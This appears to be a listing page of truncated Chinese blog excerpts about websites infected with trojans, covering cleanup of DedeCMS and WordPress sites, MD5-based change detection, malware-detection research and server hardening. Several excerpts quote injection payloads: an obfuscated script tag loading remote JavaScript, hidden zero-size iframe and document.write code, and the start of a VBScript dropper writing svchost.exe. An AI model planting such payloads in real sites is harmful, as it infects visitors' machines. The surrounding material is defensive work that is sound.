前言 周一一早网管收到来自阿里云的一堆警告,发现我们维护的一个网站下有数十个被挂马的文件.网管直接关了vsftpd,然后把警告导出邮件给我们. 取出部分大致如下: 服务器IP/名称 木马文件路径 更新时间 木马类型 状态(全部) *.*.*.* /path/*144.gif 2017/8/7 5:53 Webshell 待处理 *.*.*.* /path/*132.jpg 2017/8/7 5:23 Webshell 待处理 *.*.*.* /path/*156.txt 2017/8/7 5:2…

wordpress本身的安全性是非常的高的,一般不会被轻易的破解,被挂马,但是我们也不能够过度迷信wordpress的安全性,凡是连接上互联网的服务器和电脑,都存在被破解的风险性.所以我们在日常维护自己的网站时,一定要注重网站的安全性,最大限度的防止网站被挂上木马. 一般来说,破解网站的途径是获取网站后台的管理员权限,从而进行修改网站文件,放置木马,这种方式是最为常见的也是最容易防御的. 防御这种破解的方式请确保做好以下的工作:• 1. 管理员账号尽量不要使用admin这种简单的用户名,密码使用…

Mathematics Malware Detected Tools 重要:由于缺少测试数据,部分结论可能不正确.更多更准确的结论,还需要进行大量实验. 概述 mmdt(Mathematics Malware Detected Tools)是一款基于数学方法的最简单的类"机器学习"工具.该工具通过数学方法对目标对象进行处理,生成相应的标准"指纹",通过对指纹的处理,实现"机器学习"中的"分类"."聚类"方法…

Malware detection 目录 可执行文件简介 检测方法概述 资源及参考文献 可执行文件简介 ELF(Executable Linkable Format) linux下的可执行文件格式,按照ELF格式编写的文件包括:.so..a等 PE(Portable Executable) windows下的可执行文件格式,按照PE格式编写的文件包括: .dll..lib..exe等 参考文献[3]中对ELF的各个字段作了详细介绍 Linux和Windows可执行文件分类: ELF文件类型 说明…

案例:某公司一个lamp的服务器网站站点目录下所有文件均被植入了广告脚本如下内容: <script language=javascriptsrc=http://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad> </script>' 包括图片文件也为植入了,网站打开时就会调用这个地址,显示一个广告,造成的用户体验很恶劣,那么如何快速处理呢. 解决方法:思路是:需要查看所有目录所有文件,把以上被植入的内容删除掉. 测试数据如下: 入侵模…

最近写了两个python的脚本不过实际意义不是很大,就是想练练python写程序,一直研究web方面脚本写的少多了,还有C语言也用的少多了.现在有时间得多写写程序,别把以前学到的知识给忘了. 作者: Jerk 2017.11.7 [注:代码若被编辑器转义或编码,大家可点击代码框左上角的纯文本查看] 0×02 背景 当时想到写个这个脚本是前段时间看到一个文章写的“黑吃黑”的文章,发现shell后门网站的数据库直接暴漏在js里了,然后也去瞅了瞅就下载到了一个Webshell后门网站收到的shell的…

最近有朋友说自己的网站平时并未作弊,文章也都是原创的,更新很稳定.可不知道为什么网站突然就被各大搜索引擎降权了,一直找不到原因.最后发现是网站被挂马了,导致网站被连累了.在此,借助马海祥博客的平台,给大家简单的介绍下js挂马的方法及如何防止网站被挂马. 一.常见JS挂马方法 现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行. 这种方法使用的关键代码如下: window.ope…

缘起 在项目中, 通常都会使用代码检测工具来规范团队的代码风格, 比如eslint.随着代码的不断增加, eslint进行代码检测的时间也越来越久.每次检测的时候, 需要检测的文件和实际检测的文件极度不对称,所以便基于git diff写了这样一个小工具. 源代码 启动脚本(lint.sh) #!/bin/bash INFO='\033[36m'; NOR='\033[0m'; ERR='\033[31m'; br='dev'; echo -e "${INFO}run lint now ... j…

基于深度学习的安卓恶意应用检测 from:http://www.xml-data.org/JSJYY/2017-6-1650.htm 苏志达, 祝跃飞, 刘龙     摘要: 针对传统安卓恶意程序检测技术检测准确率低,对采用了重打包和代码混淆等技术的安卓恶意程序无法成功识别等问题,设计并实现了DeepDroid算法.首先,提取安卓应用程序的静态特征和动态特征,结合静态特征和动态特征生成应用程序的特征向量:然后,使用深度学习算法中的深度置信网络(DBN)对收集到的训练集进行训练,生成深度学习网络:…

转载自:https://cloud.tencent.com/developer/article/1010601 1.背景介绍 我们知道使用 SonarQube 可以在日常开发中检测代码质量,除了使用 IDE 上集成 SonarLint 插件检测外,如果我们想针对代码托管在 Gitlab 上每次 commit 的文件做代码检测,可以不可以呢?答案是肯定的,我们可以使用 Sonar GitLab Plugin 插件完成,该插件会针对每次提交修改的文件,添加注释行,同时添加本次提交的代码检测结果的评论…

系统管理员通常从svn/git中检索代码,部署站点后通常首先会生成该站点所有文件的MD5值,如果上线后网站页面内容被篡改(如挂马)等,可以比对之前生成MD5值快速查找去那些文件被更改,为了使系统管理员第一时间发现,可结合crontab或nagios等工具. 程序测试如下: # python check_change.py Usage: python check_change.py update /home/wwwroot python check_change.py check /home/ww…

原文地址:http://www.myhack58.com/Article/60/61/2013/37209.htm 根据生产环境不断反馈,发现不断有 PHP网站被挂木马,绝大部分原因是因为权限设置不合理造成.因为服务器软件,或是 php 程序中存在漏洞都是难免的,在这种情况下,如果能正确设置 Linux 网站目录权限, php 进程权限,那么网站的安全性实际上是可以得到保障的. 那么,造成网站被挂木马的原因是什么? ftp 连接信息被破解,对这个原因,可行的办法就是使用非常复杂的FTP 用户名(…

DedeCms做为国内使用最为广泛使用人数最多的CMS之一,经常爆出漏洞,每个漏洞的爆出,影响都是一大片,轻则被人挂广告.弹框,重则服务器成为肉机,宝贵数据丢失.那么有什么办法可以提高DedeCms的安全性呢? 先来看看原因吧,为什么PHP程序经常出漏洞,其实是由PHP程序本身决定的.PHP可复用性低,导致程序结构错综复杂,到处是冗余代码,这样不仅利于 漏洞的产生,还影响漏洞的修得:PHP程序入门简单且普遍开源,导致很多人都可直接阅读代码,搜寻漏洞:这样便有源源不断的漏洞被发现.被修复.被发现……

网站被入侵,担心被挂马,因此就想自己写个脚本来查找那些被挂马的文件 思路 需要实现准备一份未受感染的源代码和一份可能受感染的源代码,然后运行以下脚本,就能找出到底哪些文件被挂马了. 其中,主要是根据比对2份文件的md5值来过滤可能被挂马的文件(确切的说应该是被修改过的文件) Python脚本 __author__ = 'Flying' #coding:utf-8 #Date:2014.6.5 #检测修改过的文件 import os,sys,hashlib,datetime global_DirO…

转载:http://blog.csdn.net/qq_21439971/article/details/54631440 今天早上五点,收到监控宝的警告短信,说是网站M无法访问了.睡的正香,再说网站所在系统是centos,重要数据每天都备份,应该很安全,也没有在意.倒头接着睡觉去了. 早上九点,机房负责人直接给我打来电话,说是全机房网络巨慢,单位的所有网站都打不开或打开的很慢.Centos服务器被挂马的一次抓马经历 我赶紧赶了过去,查看了一下那里网络,发现175服务总是以50M/S速度向外发包,…

又经历了一次dedecms被挂马排毒的过程,排毒过程在这里跟大家分享一下. 挂马之后,网站的表现形式: 直接访问网站没有任何问题,从百度搜索的关键词访问网站,就跳转到另外一个网站. 根据我原来的排毒经验:很可能是有人在php里面写入了判断来路的代码,如果是经过百度来的,就跳转到另外一个网站,如果不是,就可以访问. 不过检查了一下php代码,没有发现任何问题. 从百度关键词访问过来的话,能够看到本网站的title,只是一闪而过,就跳转了.根据这个现象判断,马应该是在js里面.于是下载网站模板文件,…

JS挂马攻防实录 攻现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行(图1),这种方法使用的关键代码如下: window.open("","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"…

想法不错,放着以后应该会有用 网站挂马非常让人头痛,每次的安全措施都是治标不治本,想找到根本原因,只能去分析你的程序源代码,由于很多网站不是一个程序员开发,很多的注入漏洞很难发现,曾经通过公共文件加入过滤代码,基本无效,买了个叫龙盾的IIS防火墙,好像有点用,但最后还是被攻破了,sqlserver又被挂了. 每次注入都要用“UPDATE 表名 set 字段名= REPLACE(字段名, 网站挂马非常让人头痛,每次的安全措施都是治标不治本,想找到根本原因,只能去分析你的程序源代码,由于很多网站不是…

一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三:js变形加…

1. 被植入木马,然后网站打开后自动弹出博彩,赌博,色情网站,一般这种病毒的特征代码如下 二.织梦CMS被挂马清理方法 1.删除增加的管理员service.spider等用户名. 2.删除根目录的asdd.90sec.service等PHP文件. 3.删除plus目录的以下可疑文件: 4.织梦程序后台扫描提示名字为90sec的PHP文件,可以在后台->模板->自定义宏标记中删除其中的条目之后可以升级下include目录里的名为dedesql.class的PHP文件即可. 5.给plus只读权限…

一.需求 我们在用.net开发网站时,经常会用到图片上传,可以说是每个网站必备的,大到门户网站,电商网站,政务系统,OA系统,小到企业网站,个人网站,博客网站,导航网站等等,都有用到图片上传,那么在客户端浏览器中上传图片,不可避免有些不法分子将病毒伪装图片文件,然后上传到我们的网站服务器,这样造成网站崩溃.为了解决这个问题,我们在程序中先过滤,就有了接下来的文章. 二.主要代码 1.MVC中 我们就来上传一个头像,在MVC中怎么实现文件上传,请查看我的文章:[MVC系列]ASP.NET MVC中…

织梦dedecms是新手站长使用得比较多的一个建站开源程序,正因如此,也是被被入侵挂马比较多的程序.下面就来跟大家说一下怎么重新命名dedecms的include文件夹以及plus文件夹来提高网站的安全性,减少被黑客软件扫描到漏洞的概率. dedecms的漏洞主要集中在data.include.plus.dede.member几个文件夹中的php文件里,对于data这个文件夹我们可以把它移到网站的根目录外,dede可以冲命名,member可以删掉,一般用不着,special专题功能 instal…

一.织梦CMS被挂马特征汇总 2013织梦CMS被挂马特征汇总.最近很多朋友反应后台多了几个系统管理员用户:service.spider等,而且自己之前的管理员用户登陆时候会提示用户名不存在.还有朋友的织梦CMS网站里出现asdd.90sec.service等PHP格式的非DedeCMS源文件,这些木马文件内容一般为 等等,被挂马后网站根目录下会生成一堆赌博网页等. 二.织梦CMS被挂马清理方法 1.删除增加的管理员service.spider等用户名. 2.删除根目录的asdd.90sec.s…

使用NB Exploit Kit攻击的APT样本分析 from:https://cloud.tencent.com/developer/article/1092136 1.起因 近期,安恒工程师在某网络中部署的APT威胁分析设备中发现一条高危告警,该告警包含了较多可疑行为,包含在沙箱运行环境中进行增加自启动.创建网络套接字连接.读取网络文件.收集磁盘信息.获取当前用户名信息等敏感内容,并通过对原始报文分析发现该样本的下载链接也存在较大的可疑性,经过对告警内容的初步分析,基本可以推测可能是一种网页…

当时状况 Windows Server 2008 R2 Enterprise + 帝国CMS6.6 + MySql   server软件: Microsoft-IIS/7.5 操作系统: WINNT PHP版本号: 5.3.18 MYSQL版本号: 5.0.81-community-nt 全局变量: 关闭 (建议关闭) 魔术引用: 关闭 (建议开启) 上传文件: 能够 (最大文件:2M,表单:8M) 当前时间: 2014-05-30 14:11:57 使用域名: xxxx.com     ser…

首先用vs2010打开一个Asp.Net项目, 也可以通过vs菜单->生成->发布网站                           选择发布网站的路径 这样发布就OK了 下面就吧发布出来的网站挂到IIS上,控制面板->管理工具 ->Internet信息服务(IIS)管理器 在树列表中选择网站——>右键——>添加网站 填上相应的网站名称(自定义).选择应用程序池.物理路径(刚才发布的网站的路径),选上IP地址(IPv4) 若端口号已经绑上了其他网站,系统会提示是否…

本文章由Jack_Jia编写,转载请注明出处.   文章链接: http://blog.csdn.net/jiazhijun/article/details/11131891 作者:Jack_Jia    邮箱: 309zhijun@163.com 一.漏洞描述 近期,微信等多款安卓流行应用曝出高危挂马漏洞:只要点击好友消息或朋友圈中的一条网址,手机就会自动执行黑客指令,出现被安装恶意扣费软件.向好友发送欺诈短信.通讯录和短信被窃取等严重后果.在乌云漏洞平台上,包括安卓版微信.QQ.腾讯微博.Q…

今天写代码突然发现HTML文件最后多了一段VBscript代码: <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010…

昨天发现 一台服务器突然慢了 top 显示 几个进程100%以上的cpu使用 执行命令为 : /tmp/php  -s /tmp/p2.conf 基本可以确定是被挂马了 下一步确定来源 last 没有登陆记录 先干掉这几个进程,但是几分钟之后又出现了 先看看这个木马想干什么吧 netstat 看到 这个木马开启了一个端口和国外的某个ip建立了连接 但是tcpdump了一小会儿 没有发现任何数据传递 这他是想干啥? 继续查看日志吧 在cron日志中发现了www用户 有一个crontab定时操作 基…

Webshell清除-解决驱动级文件隐藏挂马…